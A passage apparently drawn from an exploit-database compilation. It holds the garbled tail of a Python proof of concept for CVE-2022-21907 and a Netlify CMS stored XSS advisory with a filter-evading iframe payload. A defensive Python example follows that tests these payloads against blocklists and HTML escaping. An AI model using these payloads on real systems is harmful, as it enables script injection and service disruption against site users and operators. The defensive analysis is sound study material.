RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
****************************stupiD, *, ,',})

# Not necessary :)
print(poc,"\n")
print(Style.RESET_ALL)
```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)

## Time spent: 05:30:00
-
Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com

Description:
1. Go to a new post and write your payload in the body field: https://cms-demo.netlify.com/#/collections/posts
Payload = <iframe src=java	sc	ript:al	ert()></iframe>
2. After saving it, the XSS payload will execute and you will see the alert box
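The stored XSS entries above (Car Rental Script, Piwigo, Netlify CMS) all come down to user text being written into HTML without output encoding. Two of the quoted payloads also show why an input filter is the wrong fix: the Piwigo payload uses mixed case (`<sCriPt>`), and the Netlify payload splits `javascript:` with literal tab characters, which browsers strip from a URL scheme before parsing it. The code below is an added example and not code from any of the products named; it runs the page's two payloads through a naive substring blocklist, a normalizing blocklist, and plain context-aware escaping, which is the fix that holds.

```python
"""Why blocklist filtering fails against the payloads quoted above, and why
output encoding does not (added example; not code from any product named)."""
import html
import re

# Payloads as quoted in the Piwigo and Netlify CMS advisories; the second one
# contains literal tab characters inside the scheme name.
PAYLOAD_PIWIGO = "<sCriPt>alert(1);</sCriPt>"
PAYLOAD_NETLIFY = "<iframe src=java\tsc\tript:alert()></iframe>"

BLOCKLIST = ("<script", "javascript:")


def naive_blocklist_allows(value):
    """Case-sensitive substring check: the kind of filter that looks fine in review.
    Returns True when the input would be accepted."""
    return not any(bad in value for bad in BLOCKLIST)


def normalized_blocklist_allows(value):
    """Same blocklist after folding case and stripping ASCII tab/CR/LF, the
    normalization a browser applies to a URL scheme. Catches both payloads, but
    it is still a blocklist, so it only covers the evasions someone thought of."""
    norm = re.sub(r"[\t\n\r]", "", value).lower()
    return not any(bad in norm for bad in BLOCKLIST)


def render_description(value):
    """Output encoding for an HTML text node: every character that could open a
    tag, attribute or entity is replaced, so the stored text is shown, not parsed."""
    return '<p class="description">' + html.escape(value, quote=True) + "</p>"


def has_active_markup(rendered):
    """True if a tag that can execute script survived into the rendered output."""
    return re.search(r"<\s*(script|iframe|img|svg)\b", rendered, re.I) is not None


if __name__ == "__main__":
    for name, p in (("piwigo", PAYLOAD_PIWIGO), ("netlify", PAYLOAD_NETLIFY)):
        print(name, "naive allows:", naive_blocklist_allows(p),
              "normalized allows:", normalized_blocklist_allows(p),
              "escaped output active:", has_active_markup(render_description(p)))
```

Escaping is context-specific: `html.escape` is correct for text nodes and quoted attribute values, while a value placed into a URL attribute, a `<script>` block or a CSS property needs that context's encoder instead. Where a field legitimately holds rich text, as a CMS body field does, the complement is an allowlist sanitizer that keeps known-safe elements and attributes and drops everything else, rather than a blocklist that tries to enumerate the bad ones.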